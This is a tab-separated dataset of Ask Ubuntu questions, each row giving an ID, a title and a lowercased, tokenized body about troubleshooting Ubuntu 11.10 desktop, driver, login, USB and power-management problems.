69435	how to get up/parent button in nautilus , without using breadcrumbs ?	similar question here : how to get back the »open parent« button in 11.10 ? however , i want always-use-location-entry to be true . so i am not using breadcrumbs . the shortkeys , both backspace and alt+uparrow , are quite helpful . however , since i 'm mainly using my mouse in nautilus , i 'd much prefer to actually have a button present that i can click . then i do n't have to switch between keyboard and mouse all the time . is there a way to add this button/functionality , while keeping always-use-location-entry to be true ? another workable solution would be to use both breadcrumbs and the location-entry ; so a parent is clickable , but i can also type a path directly .
69444	dell studio 1558 does n't suspend when logged out	on a fresh install of oneiric ( kde , 64 bit ) ca n't get the laptop to suspend on lid closing when logged out of the kde . from within kde , suspend-resume works as expected . tested both 32 and 64 bit architecture , both kde and unity -- same result : if i 'm logged in , i close the lid and laptop suspends ; if i log out -- closing the lid does n't even turn the monitor off . bug or feature ?
69446	how do i configure `` initiate_all_edge '' for compiz ?	i used to set `` initiate_all_edge '' on lucid , using gconf-editor > apps > compiz > plugins > scale > screen0 > options . that way , when i move my mouse to `` topright '' , scale is started . however , i 'm not able to do the same in oneiric . i try with topright , bottomright , topleft , bottomleft , but none works . other settings in the same schema works ok ( i 've tried with initiate_all_key , changing it to p , and it works ) . please excuse my english language . i 'm latin . edit : some feedback . i 've just noted that , if i set `` initiate_all_edge '' to anything , then sidebar stop working when i move the mouse to left edge . i only can reach it using the `` super '' key . maybe it 's related .
69455	how to change the default keyboard layout for the login screen ?	title pretty much says it all . i had it working in 11.04 but the new login screen in 11.10 does n't seem to have these settings .
69456	no programs or applications show up in dash	there are no programs on the dash list ( seacher on appmenu ) . yesterday i logged into my account and i tried to find a particular program , but there were n't any ! additionally , i tried to view installed programs and manually find programs , but nothing was displayed . and today , when i wanted to turn on ubuntu software center , it just do n't turn on .
69458	is there a way to automatically sync ubuntu one and the android client ?	is there a way to automatically sync ubuntu one and the android client ? i have tried 2 phones and all i get in `` account and sync '' menu is `` sync is off '' in both . is it normal ? thanks
69459	why is claws mail starting in offline mode ?	i am sorry if this is not the best place to ask this , but hopefully someone might be able to help . after i upgraded to ubuntu 11.10 from 11.04 , claws mail 3.7.10 began starting in offline mode . it continues to do so upon every startup . i have searched and searched but can not find any option that might affect this . am i overlooking the option ? is this a bug with the current versions of claws mail and ubuntu ? or is there some other way to fix this ? thank you .
69460	where does aptitude store files during an upgrade ?	i support a laptop running ubuntu in another state ( so i do n't have physical access to it ) . it is an eeepc with two internal drives : a 4gb flash drive with the root fs , and a larger ( ~12gb ) drive with the /home partition on it ( and plenty of free space ) . the user tried to upgrade to 11.10 , and the upgrade failed because the root partition does n't have enough free space to perform the upgrade . i remember running into a similar problem on a laptop once before , which just had one physical drive but a poorly-thought-out partition scheme ; i think i just symlinked a directory from a too-small rootfs partition to a larger partition . in this case , i think the best solution is to bind-mount whatever directory ubuntu wants to use to store its downloaded files to the larger drive . what directory ( or directories ) is the important one that needs to be 'moved ' to the larger drive ? if i can get away with just bind-mounting one directory , do i just need to do it once , at the beginning of the installation , or do i need to add the bind-mount to the fstab ( i.e . because the files are still needed after reboot , so the bind-mount needs to be persistent ) ? is there an easier or better way to accomplish the upgrade ? ( neither a fresh install nor a repartition is an option right now )
69461	how do i download a whole ubuntu one folder ?	due to problems with 11.10 i just went back using 10.04 . i thought it would be no problem since my files are all on ubuntu one . on 10.04 i seem only to be able to access my files though firefox and can only download them one by one . is there a way to download a whole folder back to my desktop
69464	is it possible to setup a dhcp server only for local virtual machines ?	i have a quick question . i have a bunch of virtual machines ( vmware workstation ) running on an ubuntu server and have found that vmware nat ( dhcp ) service is unreliable and slow . i have to use nat instead of bridging because the server is in a data-center that does not have dhcp and i do n't have enough static ip 's for all the vms . is it possible to setup the host ( ubuntu ) to be a dhcp server but only for the local virtual machines ? the server has two network interfaces , so i 'd set eth0 to be a static ip , which connects to the outside world , and eth1 to listen for dhcp . now , i am thinking if i do n't want dhcp to broadcast i would just not connect a cable to eth1 and setup the vm 's to use bridging on eth1 . that way dhcp would not broadcast through my network but be listening on that interface . would that setup work ?
69466	how to check requiriments for unity 3d ?	recently i make an ubuntu oneiric fresh install , but it is deadly slow . my computer is a hp pavilion amd phenome x3 8600 with 3gb ram and geforce6150senforce430 according to nvidia x server . so i make a few reads , and maybe the slowness it is because the hw , but i 'm not an expert , but i installed 64 bit and i think should be faster that if i installed 32 bit version , right ? so the problem must be something else , am i right ? my english is far from perfect , i 'll hope you can understand . thanks you all in advance update + with unity 2d is faster update + the test 's result suggest by kelley gives me yes .
69467	bad video driver installed- how to get rid of it ?	i had good running system of v10.04 ubuntu on my old acer travelmate 630 laptop ( about 8 years old ) for months . then i upgraded to v11.10 via update manager and it went like charm . after that , i played with system tweaking , just trivial things like screensaver lock and wallpaper , until i `` discovered '' the option `` adding hardware driver '' or something like that . i let ubuntu scan my system and it came back with a proprietary , but recommended nvidia driver . since my video play and flash rich sites was terribly slow , i hoped to get any improvement by installing something else than generic video driver . yes , i thought of my very old nvidia mobile2go graphic card and 2ghz pentium 4 as possible reason for not very responsive machine , but ... anyhow , i let the system update my graphic card driver and it turned out it was a big mistake . after reboot i could not get into my x server anymore . furthermore , i can not get to text console neither . only scrambled screen . i can get into text console only trough the grub , by pressing shift . i read a lot of postings in other forums about similar issues , tried many possible solutions , but none gave relief . i suppose , the main problem is , that i have only wireless internet connection on my laptop and that is not active when i am in grub . i got to console after grub , but no command worked in it . in other words , i do n't have got the internet connection when i am in text console . one thing more , i can start live cd without any problem , but do n't know what then . please , before i install the whole system from the scratch only because of failure of bad video card driver , could anybody tell me how could i get rid of that bad driver without new install ? thanks very much in advance !
69471	how do i speed up my old ubuntu computer ?	my computer is really slow . slow enough that each time the page updates , it updates in a `` wave '' from top to bottom , which takes about a second . i want to keep ubuntu and unity 2d , but i just need a way to get my computer to run faster , because if it continues , it just ca n't be productive . help is appreciated . ps : no , i am not interested in xubuntu
69473	super_l not working as mod4 with das keyboard	i 'm running oneiric with awesome wm . the keyboard seems to get detected with dmesg : [ 10.856491 ] input : daskeyboard as /devices/pci0000:00/0000:00:12.2/usb1/1-2/1-2.1/1-2.1.2/1-2.1.2:1.0/input/input3 [ 10.856578 ] generic-usb 0003:04d9:2013.0001 : input , hidraw0 : usb hid v1.10 keyboard [ daskeyboard ] on usb-0000:00:12.2-2.1.2/input0 [ 10.879781 ] input : daskeyboard as /devices/pci0000:00/0000:00:12.2/usb1/1-2/1-2.1/1-2.1.2/1-2.1.2:1.1/input/input4 [ 10.879867 ] generic-usb 0003:04d9:2013.0002 : input , hidraw1 : usb hid v1.10 device [ daskeyboard ] on usb-0000:00:12.2-2.1.2/input1 but when i run xev , it does n't detect any events when i press and release the key . super_r works fine . here 's the output of xmodmap : xmodmap : up to 4 keys per modifier , ( keycodes in parentheses ) : shift shift_l ( 0x32 ) , shift_r ( 0x3e ) lock control control_l ( 0x25 ) , control_r ( 0x42 ) , control_r ( 0x69 ) mod1 alt_l ( 0x40 ) , alt_r ( 0x6c ) , meta_l ( 0xcd ) mod2 num_lock ( 0x4d ) mod3 mod4 super_l ( 0x85 ) , super_r ( 0x86 ) , super_l ( 0xce ) , hyper_l ( 0xcf ) mod5 iso_level3_shift ( 0x5c ) , mode_switch ( 0xcb ) what gives ?
69474	synaptic package manager keeps crashing	synaptic keeps crashing . when i open it , it asks for the sudo password . i give the password , then the synaptic window flashes for less than a second and then goes away . what 's wrong ? after seeing this problem i uninstalled synaptic using apt-get . uninstalled , cleaned , removed , auto-removed , purged ... every possible option from apt-get . then i tried installing synaptic from scratch . still no luck . help please ! i just did a clean install of ubuntu 11.10 yesterday . i also removed the ~/.synaptic folder -- no luck . here is the terminal output : $ sudo synaptic terminate called after throwing an instance of 'std : :out_of_range' what ( ) : vector : :_m_range_check
69475	moving files between evolution and thunderbird	i ca n't find an up to date explanation on how to move all files from evolution to thunderbird . ie : mail , address books and calendars to lightning . with up to date on file locations . can someone point me in the right direction ? thanks in advance . bob .
69478	ubuntu 11.10 graphics errors ?	see the problem here ? the gui for the file browser looks strange like this . i have an evga geforce gtx560ti graphics card . i got the drivers ubuntu asked me to get . however this still happens from time to time . restarting fixes about 75 % of the time . also , from the login screen , the power menu ( with suspend , shut down , restart ) also looks like this . how can i fix this ? it 's really annoying . ps : my processor is an intel i5 , if it helps .
69481	why do n't i have the option ''install ubuntu alongside with them ''	why dont i have this option ? here are my disk sudo fdisk -l disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x5b53cc54 device boot start end blocks id system /dev/sda1 * 2048 409599 203776 7 hpfs/ntfs/exfat /dev/sda2 409600 1153767021 576678711 7 hpfs/ntfs/exfat /dev/sda3 1216962560 1250050047 16543744 7 hpfs/ntfs/exfat /dev/sda4 1250050048 1250261679 105816 c w95 fat32 ( lba ) disk /dev/sdb : 4005 mb , 4005527552 bytes 32 heads , 63 sectors/track , 3880 cylinders , total 7823296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x20d8782d device boot start end blocks id system /dev/sdb1 * 63 7822079 3911008+ c w95 fat32 ( lba )
69485	stop nautilus managing my desktop ( xfce desktop )	i recently replaced unity on my 11.10 install with xfce/xubuntu . so far i have only one problem , which is pretty much identified and solved here : how to stop nautilus managing desktop in unity the trouble is , that advice requires a 65meg download . i ca n't believe it 's doing any more than changing a single config entry somewhere . unfortunately i 'm still too noob at ubuntu to find this myself . all the advice i can see is for earlier versions of xfce so the setting i 'm supposed to change using gconf-editor or settings manager does n't exist ( or must have an entirely different name which has so far thwarted my feeble attempts to locate it ) . does anyone know where this setting is and how it can be changed outside of gnome-tweak-tools . i 'd quite like to uninstall it now but am afraid it 'll go back to how it was before .
69489	upgrading to 11.10 broke rabbitvcs	after the upgrade to 11.10 , i no longer have file manager integration with rabbitvcs , which was the main goal of having this package . is there anything i can do to fix it ? alternatively , any good svn client with file manager integration would be acceptable , much like tortoisesvn .
69492	`` multiple active partitions `` error	i am trying to install ubuntu 11.10 from a bootable usb but when i boot from usb the `` multiple active partitions `` error show up and automatically boots in windows 7 . please help ! thank you .
69495	after updating packages , unity launcher is not showing up	decided to update my packages using update-manager , now unity launcher is n't working . if force to launch unity , this is what i am getting : ilshod @ small-camel : ~ $ unity & [ 1 ] 2440 dilshod @ small-camel : ~ $ unity-panel-service : no process found dilshod @ small-camel : ~ $ checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins skipping upgrade com.canonical.unity.unity.01.upgrade skipping upgrade com.canonical.unity.unity.02.upgrade initializing core options ... done initializing bailer options ... done initializing detection options ... done i nitializing composite options ... done compiz ( opengl ) - fatal : no valid gl extensions string found . compiz ( bailer ) - info : ensuring a shell for your session window manager warning : `` '' found in configuration database is not a valid value for keybinding `` move_to_workspace_4 '' window manager warning : `` '' found in configuration database is not a valid value for keybinding `` move_to_workspace_3 '' window manager warning : `` '' found in configuration database is not a valid value for keybinding `` move_to_workspace_2 '' window manager warning : `` '' found in configuration database is not a valid value for keybinding `` move_to_workspace_1 '' window manager warning : `` '' found in configuration database is not a valid value for keybinding `` toggle_fullscreen '' if i run glxinfo , this is what i am getting : dilshod @ small-camel : ~ $ glxinfo name of display : :0.0 x error of failed request : badwindow ( invalid window parameter ) major opcode of failed request : 137 ( nv-glx ) minor opcode of failed request : 4 ( ) resource id in failed request : 0x3400003 serial number of failed request : 32 current serial number in output stream : 32 any help on this ?
69499	how can i disconnect clients from a vino vnc server at will ?	i have vino set to ask before allowing connections , but i 'm unaware of how to disconnect clients once they are connected . the only way i 've found to disconnect them is disable sharing ( and then re-enable it ) . it seems there should be some sort of connection manager to list and disconnect clients at will , but i 'm unable to find anything like this .
69502	which rdp client have possibility to mount disks from client pc ?	until ubuntu 11.10 came out terminal server client in ubuntu 11.04 offered the possibility of mounting hard drives from client side . i just wonder if there is such client that offer such possibility . i tried remotedesktop client , remmina desktop client , and remote desktop viewer . they are all lack of this function ? i really need it to use files from my ubuntu pc on windows server 2003 pc downstairs from rdp client on ubuntu 11.10 . please help . regards . helpneeder
69507	moving the launcher `` dock '' , i am confused	i have spent the last 90 min searching i keep finding things saying it will not be supported other saying it is , some people saying a utility is around some place that lets you move it . i just upgraded to 11.x i love it and think it is by far the best and most user friendly release this is one deal breaker for me . i am a native mac person and used a `` dock '' application even before os x10.0 came out . sure some people love it on the left , me i am in psd , ia , gimp and inkscape 90 % of my time and i am constantly opening up that menu when it is on the left . does any one know of this utility program people have talked about or a way to change it . i am on a project right now or i would spend the next 3 hours backing up and downgrading just so i can get work done with out cursing at my computer . thanks parabox1
69509	software center will not let me authorize	when trying to install a program from the software center it will ask for a password . i enter my password and the authentication window goes away and/or tells me there is a problem and the program never installs . i ca n't get passed it . please help ! there is no problem , my password is correct .
69511	how do i get xmonad to run with the gnome fallback session ?	i 'm not having luck getting xmonad to run in 11.10 ( x64 , fresh install ) with a gnome fallback session . i 've tried adapting the instructions from http : //markhansen.co.nz/xmonad-ubuntu-lucid/ and http : //markhansen.co.nz/xmonad-ubuntu-oneiric/ but with no luck . if anyone has ideas , i 'd like to hear them .
69513	how can i get unity3d working with my gtx570 ?	using a fresh install of 11.10 ; i 've literally done nothing other than install the nvidia drivers . it may be worthing noting that jockey-gtk did not offer me a proprietary driver to install . after installing the nvidia drivers with the following statments : sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current jockey now shows that the proprietary nvidia driver is installed and in use ; i can use the nvidia settings gui fine ; glxinfo | grep gl shows : server glx vendor string : nvidia corporation server glx version string : 1.4 server glx extensions : client glx vendor string : nvidia corporation client glx version string : 1.4 client glx extensions : gl_arb_texture_rectangle , gl_arb_texture_rg , gl_arb_texture_rgb10_a2ui , gl_nv_texture_multisample , gl_nv_texture_rectangle , gl_nv_texture_shader , tried to force unity via adding : unity_force_start to /etc/environment , which ended up with being left with just a wallpaper ; so obviously the unity wm ca n't run ; i do n't get any errors messages ; i 've googled to try and find where whatever the hell this new gdm logs to no avail . another probably useful tidbit : using : /usr/lib/nux/unity_support_test -p causes a segmentation fault ; no information is provided before that either , so that is also useless . what can i do.. ?
69514	is dolby advanced audio suported ?	is there a way to use the dolby advanced audio ( v1 ) ( this link is for version 2 , they have removed version 1 but it 's pretty much the same thing ) on my netbook running ubuntu 11.10 ? the laptop ( toshiba nb550d ) apparently comes with the dolby advanced audio hardware . inside windows there is an option to enable this via a tickbox inside the volume control settings . upon ticking the box ( and rebooting ) the sound goes from tinny and quiet , to being loud and normal in comparison to my external speakers . this only works in windows at the moment and has no effect in ubuntu . is there a way to turn this on in ubuntu ? is it even supported ? thanks .
69516	has touchpad-indicator been fixed ?	i have been using ubuntu since 11.04 . is touchpad-indicator already fixed in 11.10 ? otherwise , does anyone know if it is working in xubuntu 11.10 ?
69517	how do i use gnome trash for files in different partition ?	i have my files in a separate partition that is not mounted to /home , but only linked to it . how do i manage to be able to use the gnome trash in those files ? for example : partion 2 : mounted on /data , with a folder /data/myname partion 1 : mounted on / , with its own /home and /home/myname , inside it /home/myname/desktop and /home/myname/documents link to /data/myname/desktop and /data/myname/document respectively . suppose i have a file /data/myname/document/example.txt . when i use nautilus , and try to delete /home/myname/document/example.txt , nautilus say it ca n't use the trash . it took me a while to figure out it is because example.txt is in a different filesystem . i do n't know can another trash directory be defined in that partition so that gnome can use it ? i could have partion 2 mounted as /home with almost simular results -- i did that for a long time -- , but each time i change the linux/ubuntu installation , many configuration files in my home become broken . but in summary this new scheme does n't allow me to use gnome trash now .
69522	what command is used to start unity 2d ?	trying to use freenx remote desktop which requires a custom command for the window manager . i tried unity-2d-launcher but that just starts the launcher missing the panel for instance ( which can be started with unity-2d-panel ) . how do i start the whole thing ?
69530	ca n't start a unity session from an upgraded account but i can from a new one	after upgrading to 11.10 i ca n't seem to login into an x session in no matter what mode i try ( unity , unity 2d , recovery console , gnome , and classic gnone ) . i was able though to start a unity session from a newly created account . i see nothing obvious in /var/log/syslog /var/log/xorg.0.log /var/log/lightdm/* and ~/.xsession-error . i tried also removing all the gnome , and unity configuration directories/files from the upgraded account hoping that it would reinitialize the environment , but it did not . any suggestions please on how i may use/reset/reinitialize/reconfigure unity from my upgraded account ?
69531	how do i recover from this broken upgrade ( ? ) ?	i tried to upgrade to ubuntu 11.10 through the upgrade wizard . i had about 30 minutes left on my install , and had to leave . when i came back , my computer was frozen , so i had to do a hard reset . when it rebooted , i was shown this screen : it appeared unresponsive , but i could ctrlaltf1 and get to the terminal where i could log in . it appears that i am not connected to the 'net - sudo dhclient only appears to output one line of text rather than the several that it should . ping 192.168.1.1 does nothing , but i can ping localhost -c 4 . i was hoping that following the instructions here would give me a plain screen without any x startup ( that was my theory on why it did n't look good ) but it did n't appear to have any effect - also where the author had 7 lines of output , i had only one ( which i ca n't read , of course ) . any ideas about what i can do ? i suspect it may be an issue with the video card drivers - i have some nvidia card ( computer posts just fine , so i know the issue is after the os takes over ) . i do n't remember if i installed grub , but i did n't see any menu pop up the several times i booted . on two boot-ups it actually showed the ubuntu splash screen , but there it hung and i could n't get to the terminal like it does when i get the `` jail '' screen . if i could get it hooked up to the network i have sshd installed ( at least i can ssh to localhost , and i could ssh in from other computers before my upgrade ) , and could log in and see what i could fix that way . worst case scenario , i believe i partitioned off my /home/ directory , so i could reinstall just the os portion , but i do n't really want to do that - i had a lot of problems initially installing ubuntu with this hardware configuration in the first place and i do n't want to go through that again . so any help would be greatly appreciated ! thanks !
69534	setup auto login and now i do not have root authorization for anything	i am the sole user of my computer so i use my root user name for everything . i am tired of logging in all the time and entering a keyring so i was hoping that creating an automatic login would resolve that . it did n't , so now i have a broken password and i can not install any programs and i can not fix my password . does anybody have any help for this ? thank you .
69537	need permanent cdrom/dvd mountpoint for wine	i 've been running ubuntu on several machines for years now , and running windows software under wine as needed . even through upgrades , my 'desktop ' sees the cdrom drive , even without a disc in it . i would very much like my new 'server ' to behave the same way . right now , the only reference to the disc is /media/ -- which means every time i change the disc , i have to quit my program , open wine configurator , find the new disc , assign it , apply changes , re-run my wine application , and carry on . it 's quite laborious . i 've tried mounting /dev/sr0 , but it says it ca n't because it 's a 'special directory ' . anyway , if someone would point me in a good direction , that would be great . thanks !
69539	after upgrade , iheart radio ( on the web ) no longer plays	i used to listen to a radio station ( knrs ) online that uses iheartradio ( www.iheartradio.com ) for online radio . after upgrading to 11.10 , it no longer works . in fact , i have to `` force quit '' to get out of it . i ca n't check what format the service uses , as it freezes before i can do anything on the site . however , it does work with chromium . i can listen to other stations that use different services ( such as wls-am ) . flash , banshee , vlc , etc. , all work just fine , as far as i can tell . this is the same on two computers : my desktop , and my laptop . has anyone else experienced this ? any ideas or suggestions ?
69546	ca n't login to ubuntu anymore	ubuntu no longer lets me login . i type my password into the login screen and hit enter and the screen goes black then brings me directly back to the login screen . it gives me no messages either . i know for a fact i am typing the correct password . anybody know whats going on ? my home folder is also encrypted and i am running 11.10 thanks
69550	how do i make the power button shut the laptop down without asking ?	the energy options screen , oddly , does n't have an option for what to do when the power button is pressed ! translating the three options : '' suspend when inactive for : '' ( it 's set to not suspend ) '' when the lid is closed : '' ( it 's set to suspend ) '' when ( battery ) power is extremely low : '' ( it 's set to power off ) where are the power button options ? they appear when i run fedora 14 in the same computer .
69556	how to check battery status using terminal ?	i would like a command that check the battery status through the terminal
69558	unity desktop and mouse sensitivity	i keep accidentally moving the mouse too far to the left of the screen which brings up the unity `` taskbar '' . is there a way i can disable mouse over and strictly use the `` function/windows '' key to bring up that taskbar ? it 's kind of an annoyance to have it come up inadvertently all the time . not to be too critical the more i use unity the more i grow to like it . thanks !
69563	what are online accounts and how do they work ?	while playing around with my 11.10 install i found a section under the `` memenu ? '' which was labeled `` online accounts '' what is this feature and how does it work ?
69565	backgrounds & emblems / emblems tab disabled ?	after updating from ubuntu 11.04 to 11.10 , the backgrounds & emblems button under folder - > edit has disappeared . also , the emblems tab under folder - > properties has also disappeared . folders that already had emblems are still using them , so why ca n't i access these anymore ?
69566	nvidia drivers do n't like audio devices ?	fresh install of 11.10 : right after installing restricted drivers ( nvidia ) all audio devices disappear . why could it be ? edit : also , after disabling these restricted drivers , the audio devices ( sound card , webcam ) reappear .
69568	choosing shutdown instead logs me out of my session	if i use the menu in the upper right and say shut down the computer goes to the log out screen where i then have to click in the bottom right and tell it to shut down again . from the terminal if i say sudo poweroff it does what i would expect . whats the deal with that ?
69576	how to customize the gnome classic panel	first the picture : as you can see in the image , the colors used for the icons and the words applications and places ( in spanish in this case ) have a different background dark gray color than the rest of the panel . also the icons look rather bigger in that panel . now my questions are : can the background colors be customized so they look the same all the way through the panel . can the icons be somehow minimized a little so they do n't look strange ( bigger actually ) how to edit the way to add icons to the panel . i have to actually hold the alt key and right click on it to show the context menu which shows me the option to add something . that extra key press is not friendly at all . in this particular case i am trying to help an older man start in ubuntu . unity is too much for him but gnome is friendlier for him ( learning curve is not the best for older people.. specially 68+ year old people ) .
69578	how to boot directly into a shell ?	i am using ubuntu 11.10 ( unity ) as guest/host using virtualbox . i do n't want a unity on login and want to directly get to a shell in the guest after the boot . what changes have to be done ?
69581	source code for 'df ' command	can someone tell me how to locate the source code for the 'df ' command . my operating system is ocelot . thanks !
69582	move gnome shell window close button to left	to be clear i 'm not talking about the windows controls , but the little x button that shows up when your in the `` expose '' windows mode in gnome shell when you mouse over the activities button . i 've already used gconf to move the actual windows controls over to the left ( ubuntu 's change got me used to it , and now i like it ) , but that did n't move the x close button from the windows activity view .
69586	usb devices only recognized after i login	i 'm experiencing some troubles after upgrade 11.10 final version ... in the matter of fact , i never had troubles using the devices , with the upgrade , but i formatted the notebook , and made a clean ubuntu install and now i have this strange behavior of my os . i have a notebook a little old , but good enough to run ubuntu cool . but after the 11.10 my usb devices like keyboard , mouse , and an external hard drive was running fine , but now i ca n't login with the keyboard or have any response of mouse movements or clicking until i login in lightdm in the notebook keyboard . only after login i can use my usb devices normally ... have anyone a tip , or fix to this ? is this some kind of bug ? anyone else is in the same situation ? or passed through it ? since now , thank you for the attention .
69588	missing inhibit sleep applet for unity	i am looking for an inhibit sleep applet for ubuntu 11.10 unity , to enable me watching movies on google without having to move the mouse or change power management .
69589	what does a `` psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 '' message mean ?	this is the output of dmesg|tail [ 13064.329754 ] psmouse.c : touchpad at isa0060/serio1/input0 - driver resynched . [ 13067.095373 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 13067.104046 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 13067.113075 ] psmouse.c : touchpad at isa0060/serio1/input0 - driver resynched . [ 13073.819724 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 4 [ 13073.820864 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 13073.822467 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 13073.824034 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 13073.825164 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 13073.825172 ] psmouse.c : issuing reconnect request what does this mean ? i have ubuntu 11.04 , hp pavillion dv6-1149wm . my touchpad seems to be working fine . my keyboard however , sometimes screws up , for example , instead of typing `` word '' , it will type `` wwww '' , it 'freezes up ' and after a little bit , that 's when it types the duplicate keys instead of all the different keys i typed .
69591	how can i enable the touch-pad in 11.10 while i disabled it using touchpad-indicator in 11.04 ?	i used touchpad-indicator to disable the touch-pad in ubuntu 11.04 . now i update to ubuntu 11.10 , and i installed touchpad-indicator in ubuntu 11.10 again but i can not enable the touch-pad . when i press the shortcut set in ubuntu 11.04 , it says `` error while trying to run ( /usr/share/touchpad-indicator/change_touchpad_state.py ) '' , and i search in that dir and find out there 's no that file ( change_touchpad_state.py ) . i 'm thinking maybe this is because the new version touchpad-indicator ( 0.9 ) works in a different way . so how can i enable my touch-pad without installing ubuntu 11.04 and enable it on and then switch to 11.10 again ?
69594	my usb ports randomly stop working till a reboot ?	i have a hp pavillion dv6-1149wm , ubuntu 11.04 . i have 2 usb3.0 ports , and 2 usb2.0 ports . if i use a usb port for a long period of time [ e.x . with my usb wifi adapter ] , that specific usb port [ sometimes they stop in pairs ] randomly decide stop . after i 've rebooted , everything 's back to normal , but it is not practical to be rebooting all the time . here 's lsusb [ whilst only 1 out of 4 usb port work ] : matt : ~ $ lsusb bus 006 device 003 : id 0cde:001a z-com 802.11bg bus 006 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 004 device 002 : id 138a:0018 digitalpersona , inc bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 5986:02ac acer , inc bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub the z-com is my wifi adapter , currently plugged in to my last working usb port [ until i reboot ] . all other 3 of my usb ports do n't work . i plug in a flash drive , the light stays on , but that 's it . sometimes it will turn off about 5 seconds of being plugged in . but when i plug it in , nothing comes up on the syslog . here is lspci : 00:00.0 host bridge : advanced micro devices [ amd ] device 1705 00:01.0 vga compatible controller : ati technologies inc device 9647 00:01.1 audio device : ati technologies inc device 1714 00:04.0 pci bridge : advanced micro devices [ amd ] device 1709 00:05.0 pci bridge : advanced micro devices [ amd ] device 170a 00:06.0 pci bridge : advanced micro devices [ amd ] device 170b 00:10.0 usb controller : advanced micro devices [ amd ] hudson usb xhci controller ( rev 03 ) 00:10.1 usb controller : advanced micro devices [ amd ] hudson usb xhci controller ( rev 03 ) 00:11.0 sata controller : advanced micro devices [ amd ] hudson sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:12.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 00:13.0 usb controller : advanced micro devices [ amd ] hudson usb ohci controller ( rev 11 ) 00:13.2 usb controller : advanced micro devices [ amd ] hudson usb ehci controller ( rev 11 ) 00:14.0 smbus : advanced micro devices [ amd ] hudson smbus controller ( rev 13 ) 00:14.1 ide interface : advanced micro devices [ amd ] hudson ide controller ( rev 40 ) 00:14.2 audio device : advanced micro devices [ amd ] hudson azalia controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices [ amd ] hudson lpc bridge ( rev 11 ) 00:14.4 pci bridge : advanced micro devices [ amd ] hudson pci bridge ( rev 40 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 0 ( rev 43 ) 00:18.1 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 1 00:18.2 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 2 00:18.3 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 3 00:18.4 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 4 00:18.5 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 6 00:18.6 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 5 00:18.7 host bridge : advanced micro devices [ amd ] family 12h/14h processor function 7 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5209 ( rev 01 ) one note , i will say that the usb device i use most is my wifi adapter . [ long range wi-fire ] the usb extension that i use to plug it in is pretty old , and i 've had to tape up the ends to keep the wire from being broken ( from being moved back and forth so many times ) . could plugging in a faulty usb device cause the usb port to stop working , temporarily ?
69603	how to set up ubuntu 11.10 to automatically turn numlock on when boot-up ?	befor 11.10 ubuntuďźi can do : sudo apt-get install numlockx and edit /etc/gdm/init/default but in 11.10 , i ca n't find /etc/gdm ! how can i do ?
69606	how do i disable usb auto play ?	how does one prevent nautilus from automatically opening a window when a usb flash drive is inserted in oneiric ? the autoplay options appear to be missing from nautilus ' preferences , and using gconf-editor to enable 'media_autorun_never ' ( as suggested by this old thread : http : //ubuntuforums.org/showthread.php ? t=974087 ) appears to have no effect , even after logging out and logging back in .
69607	sound plays from laptop speakers only even when headphones are connected	i 'm using a dell vostro 1014 laptop with ubuntu 11.10 . from the time i had ubuntu 9.04 , sound comes from the laptop speakers only even when i plug in earphones or external speakers . also , if an external microphone plugged in , it does not work . dell even replaced my motherboard to check for hardware issues but the problem persists . so it is definitely not a hardware issue . the sound plays perfectly through the headphones in the pre-boot diagnostics . so i figure , this must be a problem with ubuntu not recognizing my sound card . please try to give a solution for this problem .
69608	filefrag -- what 's going on here ?	so i just found the command filefrag . i thought i 'd see if any of my files are fragmented . i have quite a few large files , [ 500mb/+ ] and every single one i 've tried has 5 to 42 extents found . what 's going on ? i have ext4 , and i have 185g of 515g free [ 63 % used ] . i thought ext3 and ext4 did n't fragment files [ unless absolutely necessary ] . i did restore all my files actually , from a ntfs partition [ my ext . hdd is ntfs . i 've thought about formatting it to ext , but it 's 0.5tb and would take a long time to recopy my files ] after i switched to a new laptop a week ago . so how do i defragment these files , and why are they fragmented ?
